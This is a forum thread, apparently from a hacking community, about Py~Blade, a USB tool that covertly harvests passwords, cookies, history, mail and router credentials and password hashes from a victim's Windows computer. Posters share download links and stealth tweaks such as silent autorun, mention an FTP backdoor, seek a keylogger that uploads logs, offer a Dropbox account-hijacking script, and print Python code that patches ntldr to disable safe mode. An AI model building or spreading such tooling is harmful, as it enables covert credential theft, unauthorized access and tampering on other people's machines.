Guest seksi90210 Posted December 23, 2010 Share Posted December 23, 2010 I have not had a chance to check this post in a long while, been so busy. Sadly, I see no updates and assume sablefoxx is busy as well. I hope to see this project continued =] Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted January 27, 2011 Author Share Posted January 27, 2011 (edited) I haven't had much time to develop Py~Blade recently so here is the current source code, it's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully). (Go forth and learn python! http://docs.python.org) http://dl.dropbox.com/u/341940/pyblade.tar.gz Edited January 27, 2011 by sablefoxx Quote Link to comment Share on other sites More sharing options...
Jen Posted January 28, 2011 Share Posted January 28, 2011 Thanks a lot sablefoxx!! This will definitely motivate me into learning python! Quote Link to comment Share on other sites More sharing options...
blksith0 Posted February 1, 2011 Share Posted February 1, 2011 Now is there a way to get the Autoplay Dialogue to stop popping up, asking what to do, on the test subjects computer? Quote Link to comment Share on other sites More sharing options...
m1k Posted February 13, 2011 Share Posted February 13, 2011 I did experience some problems... no more firefox pass logs so...i tried and tried... Solution? Just put Pyblade 0.1 on the usb key.... everything works like a charm... ;) Quote Link to comment Share on other sites More sharing options...
help Posted March 13, 2011 Share Posted March 13, 2011 @Emptiness: idk how the pyload is configured (or built, I havent checked the .py files), but when I tried to run it from a random folder (on my D drive) it complained about the folder D:\logs\%pcname%%HOUR%-%MINUTES%\ that didn"t exist. I can only conclude that the pyload is made to be run only from the root of a drive (that's what sablefox said in his first post I believe). **if this aint right the rest of this part doesnt matter** What the U3 shit does is placing it somewhere else and making it run fromthere. If the only reason u guys want it to be U3 is to make it autorunnable, well fine, here's a solution: make a .BAT file that goes to the root of the drive and then runs the bex.exe (that is placed in the root of the drive) then make that bat into an .exe (bat to exe converter, google it) then convert the exe into an .u3p (PackageFactory, once again google it) then install the .u3p onto your u3 drive.... going to the root of the drive can be generally done in two ways: cd.. cd.. cd.. cd.. .......................................(you got the point I guess) cd.. or %~d0 if you got firefox password stealer problems, just get the newest version from their site.... Quote Link to comment Share on other sites More sharing options...
doopliss Posted June 6, 2011 Share Posted June 6, 2011 I don't know how alive this project still is, but I did some work on it so I guess I might as well post it... I used the old, stable source from the first post rather than the newest source that sablefoxx dumped. It should have all of the features in the OP, plus the features listed below. Added features: -The system info log now shows the target's public IP address, and gets it from 5 different sources for redundancy's sake. Should be useful for accessing that FTP backdoor -Browser passwords can all be saved in one file, one file per browser, or both -Dumps the saved cache for IE, Chrome, and Firefox -Dumps the saved cookies of Chrome, Firefox, and Flash (couldn't get IE working) -Dumps the saved history for Chrome and Firefox in addition to IE -Dumps passwords saved in popular mail clients -Dumps password to access the victim's router (unfortunately only works on a small set of routers) -Modified U3 support: The drive now executes FBex without launching the U3 launchpad, making it stealthier Known issues: -PWDump is the only bit of the program that isn't working on on 64 bit systems -IE Cookie Viewer doesn't save I could not for the life of me figure out how to get PWDump working. I used sablefoxx's original code, it didn't work. I rewrote it, it didn't work. I don't know what to do. Here's an odd little note, tough: whenever I compiled bex.exe using py2exe on a 64-bit system, PWDump DID work on 64-bit systems, but the entire EXE wouldn't execute on any 32-bit system ("Not a valid Win32 application" error). Whenever I compiled the .exe on a 32-bit system, all of the .exe worked on 32-bit systems, and most of it worked on 64-bit systems, but not PWDump. For now, I just disabled PWDump in the configuration file by default (you can turn it on if you know the target is running 32-bit). It could have something to do with using an out-of-date version of PWDump, but I'm too frustrated with it by now to care... Apparently this wasn't an issue for others using sablefoxx's code, so maybe it's just me... Here is the modified U3 launcher, using Universal Customizer (Windows XP only): http://www.mediafire.com/?v82c88r8bc68i8y Just extract the files, click the Universal Customizer application, and follow the instructions, the .iso should've already been made. For those of you who can't run the above because you don't have XP, here is the .iso by itself: http://www.mediafire.com/?m2rc6158y2dxryt It needs to be burned to the virtual optical drive of your U3 device. Here is the blade, just extract to the root of the flash drive: http://www.mediafire.com/?2sogp1cy7lzt824 And finally, here's the source: http://www.mediafire.com/?z6d4c116i75cn3p Does anyone know any open source keyloggers that send the logs to an FTP server? I included a keylogger in my blade, but I couldn't upload that version because the one I used is commercial. If there was a good open source one, that'd be a cool thing to add. *Fwew!* Well, that certainly was a fun exercise in learning Python. Thank you for uploading the source, sablefoxx ^_^ Quote Link to comment Share on other sites More sharing options...
Jen Posted June 8, 2011 Share Posted June 8, 2011 I'll help you test soon after school ends. Tell me if you need a specific beta tester or something, I'm glad someone is still working on this project!! Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted June 23, 2011 Author Share Posted June 23, 2011 (edited) Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades! http://ge.tt/8nETsM5?c And if you're feeling a bit evil, disable safe mode (XP/2k3): # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __name__ == '__main__': patchNtldr() Edited June 23, 2011 by sablefoxx Quote Link to comment Share on other sites More sharing options...
Jen Posted June 24, 2011 Share Posted June 24, 2011 Hey sablefoxx, are you still continuing on this project or doing another one? Quote Link to comment Share on other sites More sharing options...
m1k Posted July 19, 2011 Share Posted July 19, 2011 Mubix posted the link... http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/ Not bad as a PyBlade add-on ! Quote Link to comment Share on other sites More sharing options...
chr0megreyl0tus Posted July 19, 2011 Share Posted July 19, 2011 Mubix posted the link... http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/ Not bad as a PyBlade add-on ! I think that it would be impractical to add a memory dumping tool to a project like this. A memory dumper dumps the entire contents of the installed memory on the system. So lets say you added this onto Pyblade your usb would then dump the entire system memory so if the system had 8gbs of ram around 8 gbs of data would be dumped into your usb. For a tool like Pyblade which is intended to be inserted into a computer and remove quickly it would add a lot of time depending on the amount of Ram installed on the computer. Not saying that this tool is bad i just think that it was more intended for incident response teams. As they can use dumpit on there usb without any concern for time for how long the data will copy as long as they get their memory dump. Maybe dumpit can be added on to the incident response switchblade. Although this could very well change with usb 3.0 becoming mainstream as we could dump the memory a lot faster. But for now i would recommend dumpit for more incident response tool/usb kits. That's my 2 cents anyway Quote Link to comment Share on other sites More sharing options...
m1k Posted July 20, 2011 Share Posted July 20, 2011 You are absolutely right... Just set as an option,if You have time,8gb pendrive and 4gb victim's computer memory. ;) Quote Link to comment Share on other sites More sharing options...
imJustaTechnician Posted January 19, 2012 Share Posted January 19, 2012 any more update? =D should need one for internet explorer 9, Quote Link to comment Share on other sites More sharing options...
Batman Posted April 3, 2012 Share Posted April 3, 2012 Hello, This is a great piece of software. Kudos. I have a question somewhat related to the software, but also towards windows 7. If a user does not have admin access on a computer running windows 7 64 bit, will they be able to run this off of a USB drive? Quote Link to comment Share on other sites More sharing options...
Optimalised Posted April 16, 2012 Share Posted April 16, 2012 So how come Pyblade 3.0 doesn't show me IE Logins/PWs even though it's on 1? =/ Quote Link to comment Share on other sites More sharing options...
Light Posted April 17, 2012 Share Posted April 17, 2012 are there any new updates on this? I was wanting to get the updated U3 files but they arent there anymore. If anyone can help that would be great. Quote Link to comment Share on other sites More sharing options...
Tox1k Posted April 19, 2012 Share Posted April 19, 2012 So how come Pyblade 3.0 doesn't show me IE Logins/PWs even though it's on 1? =/ You need to go to nirsofter's site and download the latest files in there, IEPassview and FireFoxPassView and a few others. All the files in there are probably still from when XP was in it's middle stage. Quote Link to comment Share on other sites More sharing options...
xBello12 Posted November 4, 2013 Share Posted November 4, 2013 We need new download links Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.